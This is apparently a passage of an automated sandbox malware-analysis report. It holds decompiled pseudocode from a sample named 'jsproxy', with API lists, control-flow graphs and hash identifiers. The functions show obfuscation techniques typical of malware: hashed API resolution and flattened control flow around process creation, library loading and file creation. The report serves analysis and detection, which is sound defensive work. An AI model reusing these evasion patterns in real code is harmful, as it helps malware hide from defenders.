				intOrPtr* _t9;
				int _t12;
				intOrPtr* _t15;
				intOrPtr* _t17;
				WCHAR* _t44;
				WCHAR* _t45;

				_t46 = __ebp;
				_t26 = __ebx;
				_t9 =  *0x2addc0;
				_t45 = __edx;
				_t44 = __ecx;
				if(_t9 == 0) {
					_t9 = E002A3E60(__ebx, E002A3F00(0xc6fbcd74), 0x7e0ae558, __ebp);
					 *0x2addc0 = _t9;
				}
				 *_t9( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				if( *0x2ae21c == 0) {
					 *0x2ae21c = E002A3E60(_t26, E002A3F00(0x9bab0b12), 0xbd6cc871, _t46);
				}
				_t12 = CreateProcessW(_t44, _t45, 0, 0, _a4, 0, 0, 0,  &_v72,  &_v88); // executed
				if(_t12 == 0) {
					return 0;
				} else {
					if(_a12 == 0) {
						_t15 =  *0x2ade3c;
						if(_t15 == 0) {
							_t15 = E002A3E60(_t26, E002A3F00(0x9bab0b12), 0x20de7595, _t46);
							 *0x2ade3c = _t15;
						}
						 *_t15(_v88.hProcess);
						_t17 =  *0x2ade3c;
						if(_t17 == 0) {
							_t17 = E002A3E60(_t26, E002A3F00(0x9bab0b12), 0x20de7595, _t46);
							 *0x2ade3c = _t17;
						}
						 *_t17(_v88.hProcess);
						return 1;
					} else {
						asm("movdqu xmm0, [esp+0x8]");
						asm("movdqu [eax], xmm0");
						return 1;
					}
				}
			}











                                                                                0x002a4b70
                                                                                0x002a4b70
                                                                                0x002a4b70
                                                                                0x002a4b79
                                                                                0x002a4b7c
                                                                                0x002a4b80
                                                                                0x002a4b93
                                                                                0x002a4b98
                                                                                0x002a4b98
                                                                                0x002a4ba6
                                                                                0x002a4bb0
                                                                                0x002a4bba
                                                                                0x002a4bd2
                                                                                0x002a4bd2
                                                                                0x002a4bf1
                                                                                0x002a4bf5
                                                                                0x002a4c7a
                                                                                0x002a4bf7
                                                                                0x002a4bfd
                                                                                0x002a4c14
                                                                                0x002a4c1b
                                                                                0x002a4c2e
                                                                                0x002a4c33
                                                                                0x002a4c33
                                                                                0x002a4c3c
                                                                                0x002a4c3e
                                                                                0x002a4c45
                                                                                0x002a4c58
                                                                                0x002a4c5d
                                                                                0x002a4c5d
                                                                                0x002a4c66
                                                                                0x002a4c72
                                                                                0x002a4bff
                                                                                0x002a4bff
                                                                                0x002a4c05
                                                                                0x002a4c13
                                                                                0x002a4c13
                                                                                0x002a4bfd

                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 002A4BF1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2305597011.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2305564478.00000000002A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000D.00000002.2305633120.00000000002AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000D.00000002.2305667381.00000000002AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_2a0000_jsproxy.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID: D$X~
                                                                                • API String ID: 963392458-2090554203
                                                                                • Opcode ID: 8197b8f98488e442369611ef9baa291d12e45f1a460b11d0b9eaece44cf12bf7
                                                                                • Instruction ID: 450440b919d7842f7203f3816a59a8899a0fab28b9cffa069cb2286b72f73596
                                                                                • Opcode Fuzzy Hash: 8197b8f98488e442369611ef9baa291d12e45f1a460b11d0b9eaece44cf12bf7
                                                                                • Instruction Fuzzy Hash: 6521D1317203025BEB14EF7ADC41B6B77A6ABD3704F00442DB559CB2A1FE70C9259B51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002A30A0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 457 2a30a0-2a30b6 458 2a30ba-2a30bf 457->458 459 2a30c0-2a30c5 458->459 460 2a30cb 459->460 461 2a3201-2a3206 459->461 462 2a31ed-2a31f1 460->462 463 2a30d1-2a30d6 460->463 464 2a3208-2a320d 461->464 465 2a3245-2a324c 461->465 466 2a32f6-2a3300 462->466 467 2a31f7-2a31fc 462->467 468 2a31da-2a31e8 463->468 469 2a30dc-2a30e1 463->469 470 2a32ab-2a32b3 464->470 471 2a3213-2a3218 464->471 472 2a3269-2a3274 465->472 473 2a324e-2a3264 call 2a3f00 call 2a3e60 465->473 467->459 468->459 474 2a31a0-2a31a8 469->474 475 2a30e7-2a30ec 469->475 478 2a32d3-2a32f3 470->478 479 2a32b5-2a32cd call 2a3f00 call 2a3e60 470->479 476 2a321a-2a3228 call 2a3d00 471->476 477 2a322d-2a3232 471->477 490 2a3291-2a329f RtlAllocateHeap 472->490 491 2a3276-2a328c call 2a3f00 call 2a3e60 472->491 473->472 484 2a31aa-2a31c2 call 2a3f00 call 2a3e60 474->484 485 2a31c8-2a31d5 474->485 475->477 482 2a30f2-2a319b 475->482 476->458 477->459 486 2a3238-2a3242 477->486 478->466 479->478 482->458 484->485 485->458 490->466 497 2a32a1-2a32a6 490->497 491->490 497->458
                                                                                C-Code - Quality: 71%
                                                                                			E002A30A0() {
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t61;
				intOrPtr* _t62;
				void* _t65;
				intOrPtr _t93;
				intOrPtr* _t95;
				intOrPtr _t107;
				intOrPtr* _t116;
				void* _t127;
				void* _t128;
				intOrPtr _t129;
				signed int _t134;
				void* _t135;
				void* _t136;

				_t93 =  *((intOrPtr*)(_t135 + 0xc));
				_t61 = 0x11f367c2;
				_t134 =  *(_t135 + 0x10);
				_t129 =  *((intOrPtr*)(_t135 + 0x14));
				_t127 =  *(_t135 + 0x18);
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t136 = _t61 - 0x12466c01;
							if(_t136 > 0) {
								break;
							}
							if(_t136 == 0) {
								if(_t93 !=  *(_t135 + 0x18)) {
									L29:
									return 1;
								} else {
									_t61 = 0x2f21cdd2;
									continue;
								}
							} else {
								if(_t61 == 0x7a26146) {
									_t61 =  ==  ? 0x2f21cdd2 : 0x12466c01;
									continue;
								} else {
									if(_t61 == 0x8928514) {
										_t95 =  *0x2ae1cc;
										if(_t95 == 0) {
											_t95 = E002A3E60(_t93, E002A3F00(0x55ab7d30), 0x815a9da3, _t134);
											 *0x2ae1cc = _t95;
										}
										_t129 =  *_t95(_t134 + 0x2c);
										_t61 = 0x39d78901;
										while(1) {
											L1:
											goto L2;
										}
									} else {
										if(_t61 != 0x11f367c2) {
											goto L18;
										} else {
											 *(_t135 + 0x18) = 0x2e7c;
											 *(_t135 + 0x18) = 0x3e0f83e1 *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 7;
											 *(_t135 + 0x18) = 0x2f149903 *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) + 0xffff1475;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) * 0x15;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) >> 2;
											 *(_t135 + 0x18) = 0x22b63cbf *  *(_t135 + 0x18) >> 0x20 >> 4;
											 *(_t135 + 0x18) =  *(_t135 + 0x18) ^ 0x8ee7705c;
											 *(_t135 + 0x10) = 0xa461;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) << 0xe;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) * 8 -  *(_t135 + 0x10) << 2;
											_t61 = 0x8928514;
											 *(_t135 + 0x10) = 0x51eb851f *  *(_t135 + 0x10) >> 0x20 >> 3;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) + 0xffffb6ab;
											 *(_t135 + 0x10) =  *(_t135 + 0x10) ^ 0x88f30986;
											while(1) {
												L1:
												goto L2;
											}
										}
									}
								}
							}
							L30:
						}
						if(_t61 == 0x2f21cdd2) {
							_t62 =  *0x2ae494;
							if(_t62 == 0) {
								_t62 = E002A3E60(_t93, E002A3F00(0x9bab0b12), 0x7facde30, _t134);
								 *0x2ae494 = _t62;
							}
							_t128 =  *_t62();
							if( *0x2add18 == 0) {
								 *0x2add18 = E002A3E60(_t93, E002A3F00(0x9bab0b12), 0x9ff0609c, _t134);
							}
							_t65 = RtlAllocateHeap(_t128, 8, 0x24c); // executed
							_t127 = _t65;
							if(_t127 == 0) {
								goto L29;
							} else {
								_t61 = 0x35eaa088;
								goto L1;
							}
						} else {
							if(_t61 == 0x35eaa088) {
								_t116 =  *0x2ae43c;
								if(_t116 == 0) {
									_t116 = E002A3E60(_t93, E002A3F00(0x9bab0b12), 0x2df4d385, _t134);
									 *0x2ae43c = _t116;
								}
								 *_t116(_t127 + 0x3c, _t134 + 0x2c, (_t129 - _t134 - 0x2c >> 1) + 1);
								_t107 =  *((intOrPtr*)(_t135 + 0x1c));
								 *(_t127 + 0x2c) =  *(_t107 + 0x1c);
								 *((intOrPtr*)(_t107 + 0xc)) =  *((intOrPtr*)(_t107 + 0xc)) + 1;
								 *(_t107 + 0x1c) = _t127;
								goto L29;
							} else {
								if(_t61 != 0x39d78901) {
									goto L18;
								} else {
									_t93 = E002A3D00(_t129);
									_t61 = 0x7a26146;
									while(1) {
										L1:
										goto L2;
									}
								}
							}
						}
						goto L30;
						L18:
					} while (_t61 != 0x100ad7b4);
					return 1;
					goto L30;
				}
			}



















                                                                                0x002a30a2
                                                                                0x002a30a6
                                                                                0x002a30ac
                                                                                0x002a30b1
                                                                                0x002a30b6
                                                                                0x002a30ba
                                                                                0x002a30ba
                                                                                0x002a30c0
                                                                                0x002a30c0
                                                                                0x002a30c0
                                                                                0x002a30c0
                                                                                0x002a30c5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002a30cb
                                                                                0x002a31f1
                                                                                0x002a32f9
                                                                                0x002a3300
                                                                                0x002a31f7
                                                                                0x002a31f7
                                                                                0x00000000
                                                                                0x002a31f7
                                                                                0x002a30d1
                                                                                0x002a30d6
                                                                                0x002a31e5
                                                                                0x00000000
                                                                                0x002a30dc
                                                                                0x002a30e1
                                                                                0x002a31a0
                                                                                0x002a31a8
                                                                                0x002a31c0
                                                                                0x002a31c2
                                                                                0x002a31c2
                                                                                0x002a31ce
                                                                                0x002a31d0
                                                                                0x002a30ba
                                                                                0x002a30ba
                                                                                0x00000000
                                                                                0x002a30ba
                                                                                0x002a30e7
                                                                                0x002a30ec
                                                                                0x00000000
                                                                                0x002a30f2
                                                                                0x002a30f2
                                                                                0x002a310d
                                                                                0x002a3111
                                                                                0x002a311f
                                                                                0x002a3123
                                                                                0x002a3130
                                                                                0x002a3139
                                                                                0x002a3147
                                                                                0x002a314b
                                                                                0x002a3153
                                                                                0x002a315b
                                                                                0x002a3175
                                                                                0x002a317f
                                                                                0x002a3187
                                                                                0x002a318b
                                                                                0x002a3193
                                                                                0x002a30ba
                                                                                0x002a30ba
                                                                                0x00000000
                                                                                0x002a30ba
                                                                                0x002a30ba
                                                                                0x002a30ec
                                                                                0x002a30e1
                                                                                0x002a30d6
                                                                                0x00000000
                                                                                0x002a30cb
                                                                                0x002a3206
                                                                                0x002a3245
                                                                                0x002a324c
                                                                                0x002a325f
                                                                                0x002a3264
                                                                                0x002a3264
                                                                                0x002a326b
                                                                                0x002a3274
                                                                                0x002a328c
                                                                                0x002a328c
                                                                                0x002a3299
                                                                                0x002a329b
                                                                                0x002a329f
                                                                                0x00000000
                                                                                0x002a32a1
                                                                                0x002a32a1
                                                                                0x00000000
                                                                                0x002a32a1
                                                                                0x002a3208
                                                                                0x002a320d
                                                                                0x002a32ab
                                                                                0x002a32b3
                                                                                0x002a32cb
                                                                                0x002a32cd
                                                                                0x002a32cd
                                                                                0x002a32e4
                                                                                0x002a32e6
                                                                                0x002a32ed
                                                                                0x002a32f0
                                                                                0x002a32f3
                                                                                0x00000000
                                                                                0x002a3213
                                                                                0x002a3218
                                                                                0x00000000
                                                                                0x002a321a
                                                                                0x002a3221
                                                                                0x002a3223
                                                                                0x002a30ba
                                                                                0x002a30ba
                                                                                0x00000000
                                                                                0x002a30ba
                                                                                0x002a30ba
                                                                                0x002a3218
                                                                                0x002a320d
                                                                                0x00000000
                                                                                0x002a322d
                                                                                0x002a322d
                                                                                0x002a3242
                                                                                0x00000000
                                                                                0x002a3242

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000008,0000024C), ref: 002A3299
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2305597011.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2305564478.00000000002A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000D.00000002.2305633120.00000000002AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000D.00000002.2305667381.00000000002AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_2a0000_jsproxy.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID: |.
                                                                                • API String ID: 1279760036-512043466
                                                                                • Opcode ID: 63780f75e840b71f4b3cd04452af713962b391d0368045dde457e7971bfa90eb
                                                                                • Instruction ID: 92f244cbe6f55373aed37e5bcaec966f6d2b5d32dd295e3e1c622346c0ba2189
                                                                                • Opcode Fuzzy Hash: 63780f75e840b71f4b3cd04452af713962b391d0368045dde457e7971bfa90eb
                                                                                • Instruction Fuzzy Hash: 8051A271A283028BCB18DF6C948452ABBE6EBD6344F20481EF452CB351DF71DE598B92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002A7080, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 508 2a7080-2a7092 call 2a34c0 511 2a70af-2a70c3 LoadLibraryW 508->511 512 2a7094-2a70aa call 2a3f00 call 2a3e60 508->512 514 2a70e0-2a70eb 511->514 515 2a70c5-2a70db call 2a3f00 call 2a3e60 511->515 512->511 521 2a7108-2a7110 514->521 522 2a70ed-2a7103 call 2a3f00 call 2a3e60 514->522 515->514 522->521
                                                                                C-Code - Quality: 75%
                                                                                			E002A7080(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
				struct HINSTANCE__* _t6;
				intOrPtr* _t7;
				intOrPtr* _t9;
				intOrPtr _t17;
				signed int _t28;
				void* _t29;
				WCHAR* _t30;
				void* _t31;

				_t15 = __ebx;
				_t28 = __edx;
				_t30 = E002A34C0(__ecx);
				if( *0x2add1c == 0) {
					 *0x2add1c = E002A3E60(__ebx, E002A3F00(0x9bab0b12), 0xe4b28d97, _t31);
				}
				_t6 = LoadLibraryW(_t30);
				_t17 =  *0x2ae548; // 0x347de8
				 *(_t17 + 0x30 + _t28 * 4) = _t6;
				_t7 =  *0x2ae494;
				if(_t7 == 0) {
					_t7 = E002A3E60(_t15, E002A3F00(0x9bab0b12), 0x7facde30, _t31);
					 *0x2ae494 = _t7;
				}
				_t29 =  *_t7();
				_t9 =  *0x2adf30;
				if(_t9 == 0) {
					_t9 = E002A3E60(_t15, E002A3F00(0x9bab0b12), 0x5010a54d, _t31);
					 *0x2adf30 = _t9;
				}
				return  *_t9(_t29, 0, _t30);
			}











                                                                                0x002a7080
                                                                                0x002a7082
                                                                                0x002a7089
                                                                                0x002a7092
                                                                                0x002a70aa
                                                                                0x002a70aa
                                                                                0x002a70b0
                                                                                0x002a70b2
                                                                                0x002a70b8
                                                                                0x002a70bc
                                                                                0x002a70c3
                                                                                0x002a70d6
                                                                                0x002a70db
                                                                                0x002a70db
                                                                                0x002a70e2
                                                                                0x002a70e4
                                                                                0x002a70eb
                                                                                0x002a70fe
                                                                                0x002a7103
                                                                                0x002a7103
                                                                                0x002a7110

                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,002A721D,002A68AC), ref: 002A70B0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2305597011.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2305564478.00000000002A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000D.00000002.2305633120.00000000002AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000D.00000002.2305667381.00000000002AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_2a0000_jsproxy.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: }4
                                                                                • API String ID: 1029625771-1595172754
                                                                                • Opcode ID: 9f0614d1a557f3036bdd3f790692ee25062b6b9846afcc9fd56a772f7f0fb92f
                                                                                • Instruction ID: 6bcecbe3b0313159c9d0e84d07809e682139281b400e1a911fdc61c55b77266b
                                                                                • Opcode Fuzzy Hash: 9f0614d1a557f3036bdd3f790692ee25062b6b9846afcc9fd56a772f7f0fb92f
                                                                                • Instruction Fuzzy Hash: D301AD30B342110B9B14EF79AC4462B6AEBAFE77487100029F01ADB716FF34CD228B90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002A80A0, Relevance: 3.2, APIs: 2, Instructions: 219fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 531 2a80a0-2a815b 532 2a8163-2a8168 531->532 533 2a8170-2a8175 532->533 534 2a817b 533->534 535 2a8338-2a833d 533->535 536 2a8181-2a8186 534->536 537 2a8287-2a829b call 2a34c0 534->537 538 2a836f-2a8377 535->538 539 2a833f-2a8344 535->539 540 2a818c-2a8191 536->540 541 2a8252-2a8259 536->541 557 2a82bb-2a82e3 537->557 558 2a829d-2a82b5 call 2a3f00 call 2a3e60 537->558 545 2a8379-2a8391 call 2a3f00 call 2a3e60 538->545 546 2a8397-2a83bb CreateFileW 538->546 542 2a8346-2a834b 539->542 543 2a8365-2a836a 539->543 552 2a81e3-2a821a 540->552 553 2a8193-2a8198 540->553 548 2a825b-2a8271 call 2a3f00 call 2a3e60 541->548 549 2a8276-2a8282 541->549 554 2a834d-2a8352 542->554 555 2a83c7-2a83ce 542->555 543->533 545->546 550 2a83ee-2a83fa 546->550 551 2a83bd-2a83c2 546->551 548->549 549->533 551->533 564 2a821c-2a8232 call 2a3f00 call 2a3e60 552->564 565 2a8237-2a824d 552->565 553->554 563 2a819e-2a81e1 call 2ab6e0 553->563 554->533 566 2a8358-2a8364 554->566 561 2a83eb-2a83ec CloseHandle 555->561 562 2a83d0-2a83e6 call 2a3f00 call 2a3e60 555->562 583 2a8300-2a830b 557->583 584 2a82e5-2a82fb call 2a3f00 call 2a3e60 557->584 558->557 561->550 562->561 563->533 564->565 565->533 594 2a8328-2a8333 583->594 595 2a830d-2a8323 call 2a3f00 call 2a3e60 583->595 584->583 594->532 595->594
                                                                                C-Code - Quality: 71%
                                                                                			E002A80A0(signed int __edx) {
				short _v524;
				struct _SECURITY_ATTRIBUTES* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				intOrPtr _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				void* __ebx;
				void* __ebp;
				void* _t58;
				void* _t64;
				void* _t66;
				void* _t73;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t82;
				void* _t83;
				intOrPtr* _t86;
				void* _t88;
				intOrPtr _t89;
				intOrPtr* _t90;
				void* _t92;
				void* _t96;
				intOrPtr _t101;
				char _t105;
				signed int _t122;
				void* _t125;
				void* _t127;
				void* _t128;
				signed int* _t129;
				void* _t131;

				_t122 = __edx;
				_t129 =  &_v596;
				_v584 = 0x9318;
				_t58 = 0x343bfd89;
				_v584 = _v584 ^ 0xde90c338;
				_v584 = _v584 ^ 0xde905120;
				_v596 = 0x7d19;
				_v596 = _v596 << 9;
				_v596 = _v596 >> 0xe;
				_v596 = _v596 + 0xffff07e5;
				_v596 = _v596 | 0x8aea6eef;
				_v596 = _v596 + 0xd867;
				_v596 = _v596 + 0x9c41;
				_v596 = _v596 + 0x3de0;
				_v596 = _v596 + 0x218b;
				_v596 = _v596 ^ 0x00014403;
				_v592 = 0x2591;
				_t128 = _v584;
				_t96 = 0;
				_v592 = _v592 * 0x7d;
				_v592 = _v592 + 0x8d68;
				_v592 = _v592 + 0xffff8911;
				_v592 = _v592 * 0x6a;
				_v592 = _v592 + 0xffff93d5;
				_v592 = _v592 ^ 0x07a13cd2;
				_v588 = 0x789;
				_v588 = _v588 >> 1;
				_v588 = _v588 ^ 0xaee58af2;
				_v588 = _v588 ^ 0xaee58936;
				while(1) {
					L1:
					goto L2;
					do {
						while(1) {
							L2:
							_t131 = _t58 - 0xea5411f;
							if(_t131 > 0) {
								break;
							}
							if(_t131 == 0) {
								_t73 = E002A34C0(0x2ad970);
								_t122 =  *0x2ae158;
								_t127 = _t73;
								if(_t122 == 0) {
									_t122 = E002A3E60(_t96, E002A3F00(0xc6fbcd74), 0xba71dd03, _t128);
									 *0x2ae158 = _t122;
								}
								_t101 =  *0x2ae54c; // 0x30dfb0
								_t50 = _t101 + 0x260; // 0x30e210
								_t51 = _t101 + 0x18; // 0x30dfc8
								 *_t122( &_v524, 0x104, _t127, _t51, _t50);
								_t78 =  *0x2ae494;
								_t129 =  &(_t129[5]);
								if(_t78 == 0) {
									_t83 = E002A3F00(0x9bab0b12);
									_t122 = 0x7facde30;
									_t78 = E002A3E60(_t96, _t83, 0x7facde30, _t128);
									 *0x2ae494 = _t78;
								}
								_t125 =  *_t78();
								_t80 =  *0x2adf30;
								if(_t80 == 0) {
									_t82 = E002A3F00(0x9bab0b12);
									_t122 = 0x5010a54d;
									_t80 = E002A3E60(_t96, _t82, 0x5010a54d, _t128);
									 *0x2adf30 = _t80;
								}
								 *_t80(_t125, 0, _t127);
								_t58 = 0x2c2d24c8;
								goto L1;
							} else {
								if(_t58 == 0x2f64d8b) {
									_t86 =  *0x2ae1d4;
									if(_t86 == 0) {
										_t88 = E002A3F00(0x9bab0b12);
										_t122 = 0xa229df38;
										_t86 = E002A3E60(_t96, _t88, 0xa229df38, _t128);
										 *0x2ae1d4 = _t86;
									}
									 *_t86( &_v572);
									_t58 = 0xc5e088d;
									continue;
								} else {
									if(_t58 == 0x6f65414) {
										_t89 = _v568;
										_t105 = _v572;
										_v560 = _t89;
										_v552 = _t89;
										_v544 = _t89;
										_v536 = _t89;
										_t90 =  *0x2adee4;
										_v564 = _t105;
										_v556 = _t105;
										_v548 = _t105;
										_v540 = _t105;
										_v532 = 0;
										if(_t90 == 0) {
											_t92 = E002A3F00(0x9bab0b12);
											_t122 = 0x4bf45878;
											_t90 = E002A3E60(_t96, _t92, 0x4bf45878, _t128);
											 *0x2adee4 = _t90;
										}
										 *_t90(_t128, 0,  &_v564, 0x28);
										_t58 = 0x3557bd8c;
										_t96 =  !=  ? 1 : _t96;
										continue;
									} else {
										if(_t58 != 0xc5e088d) {
											goto L24;
										} else {
											_v580 = 0xa8c00;
											_v576 = 0;
											_v596 = E002AB6E0(_v580, _v576, 0x989680, 0);
											_v592 = _t122;
											_v588 = _v588 - _v596;
											_t58 = 0xea5411f;
											asm("sbb [esp+0x2c], ecx");
											continue;
										}
									}
								}
							}
							L35:
						}
						if(_t58 == 0x2c2d24c8) {
							if( *0x2ade04 == 0) {
								_t66 = E002A3F00(0x9bab0b12);
								_t122 = 0xb66d748a;
								 *0x2ade04 = E002A3E60(_t96, _t66, 0xb66d748a, _t128);
							}
							_t64 = CreateFileW( &_v524, _v584, _v596, 0, _v592, _v588, 0); // executed
							_t128 = _t64;
							if(_t128 == 0xffffffff) {
								goto L34;
							} else {
								_t58 = 0x6f65414;
								goto L2;
							}
						} else {
							if(_t58 == 0x343bfd89) {
								_t58 = 0x2f64d8b;
								goto L2;
							} else {
								if(_t58 == 0x3557bd8c) {
									if( *0x2ade3c == 0) {
										 *0x2ade3c = E002A3E60(_t96, E002A3F00(0x9bab0b12), 0x20de7595, _t128);
									}
									CloseHandle(_t128); // executed
									L34:
									return _t96;
								} else {
									goto L24;
								}
							}
						}
						goto L35;
						L24:
					} while (_t58 != 0xcfe8e);
					return _t96;
					goto L35;
				}
			}













































                                                                                0x002a80a0
                                                                                0x002a80a0
                                                                                0x002a80a6
                                                                                0x002a80ae
                                                                                0x002a80b3
                                                                                0x002a80bb
                                                                                0x002a80c3
                                                                                0x002a80ca
                                                                                0x002a80ce
                                                                                0x002a80d2
                                                                                0x002a80d9
                                                                                0x002a80e0
                                                                                0x002a80e7
                                                                                0x002a80ee
                                                                                0x002a80f5
                                                                                0x002a80fc
                                                                                0x002a8103
                                                                                0x002a8112
                                                                                0x002a8116
                                                                                0x002a8119
                                                                                0x002a811d
                                                                                0x002a8125
                                                                                0x002a8133
                                                                                0x002a8137
                                                                                0x002a813f
                                                                                0x002a8147
                                                                                0x002a814f
                                                                                0x002a8153
                                                                                0x002a815b
                                                                                0x002a8163
                                                                                0x002a8163
                                                                                0x002a8168
                                                                                0x002a8170
                                                                                0x002a8170
                                                                                0x002a8170
                                                                                0x002a8170
                                                                                0x002a8175
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002a817b
                                                                                0x002a828c
                                                                                0x002a8291
                                                                                0x002a8297
                                                                                0x002a829b
                                                                                0x002a82b3
                                                                                0x002a82b5
                                                                                0x002a82b5
                                                                                0x002a82bb
                                                                                0x002a82c1
                                                                                0x002a82c8
                                                                                0x002a82d7
                                                                                0x002a82d9
                                                                                0x002a82de
                                                                                0x002a82e3
                                                                                0x002a82ea
                                                                                0x002a82ef
                                                                                0x002a82f6
                                                                                0x002a82fb
                                                                                0x002a82fb
                                                                                0x002a8302
                                                                                0x002a8304
                                                                                0x002a830b
                                                                                0x002a8312
                                                                                0x002a8317
                                                                                0x002a831e
                                                                                0x002a8323
                                                                                0x002a8323
                                                                                0x002a832c
                                                                                0x002a832e
                                                                                0x00000000
                                                                                0x002a8181
                                                                                0x002a8186
                                                                                0x002a8252
                                                                                0x002a8259
                                                                                0x002a8260
                                                                                0x002a8265
                                                                                0x002a826c
                                                                                0x002a8271
                                                                                0x002a8271
                                                                                0x002a827b
                                                                                0x002a827d
                                                                                0x00000000
                                                                                0x002a818c
                                                                                0x002a8191
                                                                                0x002a81e3
                                                                                0x002a81e7
                                                                                0x002a81eb
                                                                                0x002a81ef
                                                                                0x002a81f3
                                                                                0x002a81f7
                                                                                0x002a81fb
                                                                                0x002a8200
                                                                                0x002a8204
                                                                                0x002a8208
                                                                                0x002a820c
                                                                                0x002a8210
                                                                                0x002a821a
                                                                                0x002a8221
                                                                                0x002a8226
                                                                                0x002a822d
                                                                                0x002a8232
                                                                                0x002a8232
                                                                                0x002a8241
                                                                                0x002a8245
                                                                                0x002a824a
                                                                                0x00000000
                                                                                0x002a8193
                                                                                0x002a8198
                                                                                0x00000000
                                                                                0x002a819e
                                                                                0x002a81a0
                                                                                0x002a81a8
                                                                                0x002a81c4
                                                                                0x002a81c8
                                                                                0x002a81d4
                                                                                0x002a81d8
                                                                                0x002a81dd
                                                                                0x00000000
                                                                                0x002a81dd
                                                                                0x002a8198
                                                                                0x002a8191
                                                                                0x002a8186
                                                                                0x00000000
                                                                                0x002a817b
                                                                                0x002a833d
                                                                                0x002a8377
                                                                                0x002a837e
                                                                                0x002a8383
                                                                                0x002a8391
                                                                                0x002a8391
                                                                                0x002a83b4
                                                                                0x002a83b6
                                                                                0x002a83bb
                                                                                0x00000000
                                                                                0x002a83bd
                                                                                0x002a83bd
                                                                                0x00000000
                                                                                0x002a83bd
                                                                                0x002a833f
                                                                                0x002a8344
                                                                                0x002a8365
                                                                                0x00000000
                                                                                0x002a8346
                                                                                0x002a834b
                                                                                0x002a83ce
                                                                                0x002a83e6
                                                                                0x002a83e6
                                                                                0x002a83ec
                                                                                0x002a83f1
                                                                                0x002a83fa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002a834b
                                                                                0x002a8344
                                                                                0x00000000
                                                                                0x002a834d
                                                                                0x002a834d
                                                                                0x002a8364
                                                                                0x00000000
                                                                                0x002a8364

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE,?,?), ref: 002A83B4
                                                                                • CloseHandle.KERNELBASE(?,?,3251FEFE,?,?), ref: 002A83EC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2305597011.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2305564478.00000000002A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000D.00000002.2305633120.00000000002AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000D.00000002.2305667381.00000000002AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_2a0000_jsproxy.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateFileHandle
                                                                                • String ID:
                                                                                • API String ID: 3498533004-0
